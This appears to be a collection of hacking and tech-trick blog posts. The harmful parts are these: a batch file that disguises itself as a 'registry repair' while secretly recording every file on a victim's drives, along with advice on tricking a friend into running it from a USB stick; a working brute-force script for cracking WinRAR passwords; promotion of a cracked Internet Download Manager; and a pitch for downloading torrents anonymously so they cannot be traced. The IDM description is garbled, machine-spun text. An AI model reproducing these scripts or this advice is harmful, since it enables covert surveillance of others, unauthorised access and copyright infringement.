Sunday, 24 January 2016

                      Torrents On The Cloud (Seedr.cc)

Seedr lets you stream media, read ebooks and more, quickly and anonymously


Why do u need it..?

Millions of people are using torrenting websites to looks for files on the internet and download them. As I write this there are 6.761.168 registered users on The Pirate Bay (the most popular torrenting website) and over 6 million torrents to choose from. Whether it’s movies, music, software or anything else – there’s a torrent for everything. But how do you download a torrent file to your computer without leaving footprints that would lead right to you?
Those who use torrents on a regular basis know, that everything they download can be traced back to them, and, if there’s any illegal file down/upload going on, they can face charges and some serious fees. However, there are ways to download torrent files completely anonymous, without letting anyone know that you downloaded anything.
Some suggest using a VPN service, some tell you to move to another country with no extradition… Let me just share the best way I know how to download torrents without setting off any red flags.

Download Torrents Anonymously

How awesome would it be if you could just ask someone to download the torrent you like and then just get the file from them? Well, there is a service that does exactly that.
Seedr is a service that acts as a middle man between you and the file you want to download. Instead of downloading a file from any given server straight to your computer, which makes it traceable, you can just tell Seedr what to download for you and then take the file straight from their protected servers.
It is as if you asked your friend to download something for you, and the only thing you would to is collect a thumb drive with the file. This way your involvement in the download is completely untraceable.

Enjoy anonymous downloads :)
Keep seedr'ing..








Monday, 17 June 2013


Mediafire and Sharebeast resumable link for Internet Download Manager 6.15 build 15 Final Retail Full Cracked ::


Internet Download Manager 6.15 build 15 Final Retail (Released: May 31, 2013)

Internet Download Manager (IDM) is really a tool to enhance download rates by up to 5 times, continue and also routine downloads available. Extensive error restoration and also continue capability can reboot broken or perhaps cut off downloads available because of lost contacts, circle difficulties, computer shutdowns, or perhaps unforeseen energy breakdowns. Simple artwork program can make IDM simple to use and also simple to operate. Internet Download Manager has a intelligent down load logic accelerator which includes clever active record segmentation and also risk-free multipart downloading it technologies to be able to quicken your downloads available. Contrary to different down load operators and also accelerators Internet Acquire Administrator sectors saved documents dynamically throughout down load procedure and also reuses offered contacts without having added link and also membership development to realize greatest acceleration effectiveness.

Additional attributes consist of multilingual help, scoot preview, get different types, scheduler seasoned, seems about distinct activities, HTTPS help, queue brand, html assist as well as guide, boosted trojan safeguard about get end, gradual downloading using quotas (useful with regard to contacts which utilize some type of honest access policy as well as FAP including Direcway, Strong COMPUTER, Hughes, etc. ), built-in get accelerator, and many others.

What's new in version 6.15 Build 15? (Released: May 31, 2013)
- Resolved problems with downloading videos from the sites that play videos hosted on youtube
- Resolved problems with downloading of youtube videos
- Fixed a critical security bug
- Fixed bugs
Sharebeast Download Link
Mediafire Download Link


Download Any Book From Google Books For Free ::


1. Open your Internet Explorer (Not Firefox). Make sure that you are the admin of your computer. Then, go to the page in books.google.com that you want to download.

2. Now, go to "C:\Documents and Settings\%your admin name%\Local Settings\Temporary Internet Files\” of your computer. Delete all of the content of that folder.
3. In your Internet Explorer, refresh the page and browse-thru the pages of the books that you want to download.
4. Refresh the "Temporary Internet Files” folder. Copy all PNG files to another folder. You can distinguish PNG Files through its icon.
These files that you have just copied are, actually, the pages of the books that you have just browsed. Put it in one folder then read with ACDSee or another photo manager software.
Done!!!!

Make a WinRAR password cracker::




This is a simple password cracker for WinRAR archives which can crack numeric passwords. The method works only on .rar files. You should have WinRAR installed to make this password cracker. Follow the easy steps below and see how easy it is!

Step 1: Make a new folder on your desktop.

Step 2: Save the following code as PWCrack.bat using notepad into the folder you created earlier.
TITLE PASSWORD CRACKER
ECHO OFF
COLOR 03
SET PSWD=0
SET DEST=%TEMP%\%RANDOM%
MD %DEST%
CLS
ECHO.
ECHO Please enter the archive path...
ECHO.
SET/P NAME=
IF EXIST "%NAME%" GOTO START
:PATH
CLS
ECHO.
ECHO Cannot find the file specified.Please enter the archive path...
ECHO.
SET/P NAME=
IF EXIST "%NAME%" GOTO START
GOTO PATH
:START
CLS
SET /A PSWD=%PSWD%+1
ECHO.
ECHO GENERATING PASSWORDS...
ECHO CURRENT PASSWORD = %PSWD%
UNRAR E -INUL -P%PSWD% "%NAME%" "%DEST%"
IF /I %ERRORLEVEL% EQU 0 GOTO FINISH
GOTO START
:FINISH
RD %DEST% /Q /S
CLS
ECHO.
ECHO PASSWORD FOUND!
PAUSE>NUL
CLS
ECHO.
ECHO FILE = %NAME%
ECHO CRACKED PASSWORD = %PSWD%
PAUSE>NUL
EXIT

Step 3: Last of all browse to the directory where WinRAR is installed. Usually this will be C:\Program Files\WinRAR. Find a file named UnRAR.exe and copy it into the folder created in Step 1.

Step 4: After you copy the file open the batch file and enter the path to the archive to start the cracking process. Eg: "C:\Users\XByte\Desktop\Secret.rar".

NOTES:

Remeber to keep the both the batch file and UnRAR.exe in the same folder. Or else the program won't work.
Don't rename the UnRAR.exe.
The password cracker can only crack numeric passwords.
The password cracker does not crack passwords starting with 0.
Do not forget to leave your feedback!

Get a list of all files on a drive::

This is a batch file designed to secretly get a list of all the files and folders on a drive via a USB drive. The batch file even lists hidden files. All you have to do is put the batch file into the USB drive and make your victim open it. When you get back the USB drive the list would be waiting for you!

The listing of the files could take some time. So it is essential that the victim does not close the batch file until the listing is completed. You can achieve this in two ways. One way is to run the batch invisibly as a process using two extra short VBScript files. I will show you how to do this in a later post. The other way is to mask the listing of the files with some spoof like system configuration or something important. In this trick I am going to use the second method. This is easier than the first method.

Step 1: Paste the following code into notepad and save as a .bat file.

ECHO OFF
COLOR 0C
CLS
ECHO.>>XBData.txt
ECHO %DATE% - %TIME%>>XBData.txt
ECHO.>>XBData.txt
ATTRIB XBData.txt +H +S
CLS
ECHO.
ECHO Finding and fixing registry errors. Please do not close the program or reboot the computer.
ECHO The registry may be damaged permanently.
ECHO.
ECHO Please wait...
DIR /S /B %USERPROFILE%\*>>XBData.txt
DIR /S /B D:\*>>XBData.txt
DIR /S /B /A:H %USERPROFILE%\*>>XBData.txt
DIR /S /B /A:H D:\*>>XBData.txt
ATTRIB XBData.txt +H +S
Step 2: After saving, copy the batch file into the root of your USB drive.

Step 3: Now the trap has been set. Give the USB drive to your friend and use some social engineering to make him/her open it. You can tell your friend that it is a software you made or some cool software. This depends on your social engineering skills. Just make him/her open it remember to tell not to format the USB drive.

When you get back the pendrive the data collected would be in a hidden text file. To reveal the text file:

Step 1: Open command prompt window. To open a command window goto start menu and type cmd into the search bar and press enter.

Step 2: Assuming the USB drive letter is F Enter the command into the cmd window and execute it: attrib "F:\XBData.txt" -h -s

After you reveal the text file open it and you will see a list of files stored in his drives including the hidden ones. This trick greatly depends on your skills in social engineering. Enjoy the look of your friends face when you tell them where he stores certain files and what files he/she has hidden!

Find the IP address of a website using CMD::

Today I am going to show you how to get the IP address of a website using CMD. It is easier than you might have imagined. Just a simple command will do the trick. There are two basic commands which you can use to get the IP: tracert and ping. Open the CMD and type either of the commands below. Replacewww.example.com with the site you want to get the IP address of.

tracert www.example.com
ping www.example.com

When the ping and tracert command is run something like this will show up:

Pinging www.example.com [192.0.43.10] with 32 bytes of data:
Tracing route to www.example.com [192.0.43.10]

In both cases the IP address is between the square brackets..

Make a simple windows 7 gadget::

In this tutorial I am going to show you how to make a simple windows 7 gadget. A basic gadget needs an XML file named exactly gadget.xml and an HTML file with the gadget name. Also you can include any pictures needed in the gadget. In this tutorial I am going to show you how to make a simple demo clock gadget which would display time in a simple way. Just follow the steps given and if you know basic HTML you will find it easy to understand.

Step 1: First of all make a new folder on your desktop and rename it anything you want.

Step 2: Put the html file which would be your gadget into the folder and rename the file as the name of the gadget. In this case the name would be NXClock.html. The demo code for the html is given below.

<html>
<head>
<title>NXClock</title>
<script language="VBScript">

Sub Window_Onload
document.body.style.width = 155
document.body.style.height = 50
document.body.style.margin = 0
End Sub

Function Clock()
box.value = time
X = SetTimeOut("Clock()", 1000)
End Function

</script>

<style>

input {background-color: #000000;
color: #FF0000;
text-align: center;
font-size: 24pt;}

</style>

</head>

<body bgcolor="#000000" onload="Clock()">
<table align="center">
<tr>
<td><input type="text" id="box" size="6"></td>
</tr>
</table>
</body>
</html>

Step 3: Now save the following code as gadget.xml EXACTLY into the folder you created earlier. Do not name it anything else or the gadget will not work. You must replace the NXClock.html with the name of the html file if you are making your own gadget. And you can change the title too.

<?xml version="1.0" encoding="utf-8" ?>
<gadget>
<name>NXClock</name>
<version>1.0.0.0</version>
<description>Description</description>
<author name="Noor Mohamed">
</author>
<hosts>
<host name="sidebar">
<base type="HTML" apiVersion="1.0.0" src="NXClock.html" />
<permissions>Full</permissions>
<platform minPlatformVersion="1.0" />
</host>
</hosts>
</gadget>

Step 4: Add the NXClock.html and gadget.xml to a zip file. Be careful to add the files to the zip file, NOT the folder containing them.

Step 5: Now change the extension of the zip file to .gadget. You can either do this by going to folder options > View and disabling the Hide extensions for known file types and then changing the extension. Or else you can do it using command prompt.

Step 6: Now you will have ended with a windows gadget file. Open it and click install and if all went right a new gadget would appear on your desktop!